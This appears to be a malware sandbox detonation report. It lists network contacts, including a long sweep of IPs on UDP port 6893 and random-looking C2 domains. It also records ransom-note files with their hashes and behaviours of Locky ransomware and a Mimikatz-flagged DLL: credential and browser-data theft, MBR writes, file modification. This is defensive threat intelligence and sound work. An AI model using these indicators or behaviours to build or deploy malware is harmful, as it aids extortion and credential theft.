FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 api.blockcypher.com udp
US 104.20.98.10:80 api.blockcypher.com tcp
US 8.8.8.8:53 btc.blockr.io udp
US 8.8.8.8:53 bitaps.com udp
NL 178.128.255.179:443 bitaps.com tcp
US 8.8.8.8:53 chain.so udp
US 172.67.40.90:443 chain.so tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.146:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp

Files

memory/2892-0-0x0000000000220000-0x0000000000251000-memory.dmp

memory/2892-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2892-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2892-5-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2892-65-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2892-85-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___RZUPL6_.hta

MD5 2f9f15e627a1b39a04879fbb59d1ee4c
SHA1 452b0f36fd42cd8394f507e0da7e7244c9cdfbe9
SHA256 c42f718d6828dfaf2f63c8102891c38eda032e8405164568ada5c489bd245a21
SHA512 46285b7742254f1fde78c6a03b738f183ea7a352869ad4cf2216037137aa40fb019bf250a2aa89103faf6b38fd06145e2118f10390764d321e282da57a72e54f

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___OV2T4ZEX_.txt

MD5 01f6497d9a022fe45a88a65f69fe172d
SHA1 72e3b9793ff33feba5090c2c6aef76bc8a2e6cfb
SHA256 ac5716b4814d3de1086f29119a6f78f0b63aace55680b91d6d6620ce95f1fc6b
SHA512 9dccf6d3a7b08c6120c68a844ec667eae365edb507bec6e8becb93530e1358d230b0c95c238474cdbd80e6b4cd2ccbdc6558774bf04600259466b46aaf45e66f

C:\Users\Admin\AppData\Local\Temp\CabE1AA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarE1CC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20241010-en

Max time kernel

141s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Signatures

Locky

ransomware locky

Locky family

locky

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Locky.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
IE 86.104.134.144:80 tcp
IE 86.104.134.144:80 tcp

Files

memory/1668-0-0x00000000002A0000-0x00000000002A4000-memory.dmp

memory/1668-1-0x00000000002A0000-0x00000000002A4000-memory.dmp

memory/1668-3-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1668-4-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1668-6-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1668-8-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1668-12-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1668-13-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1668-15-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B14E.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
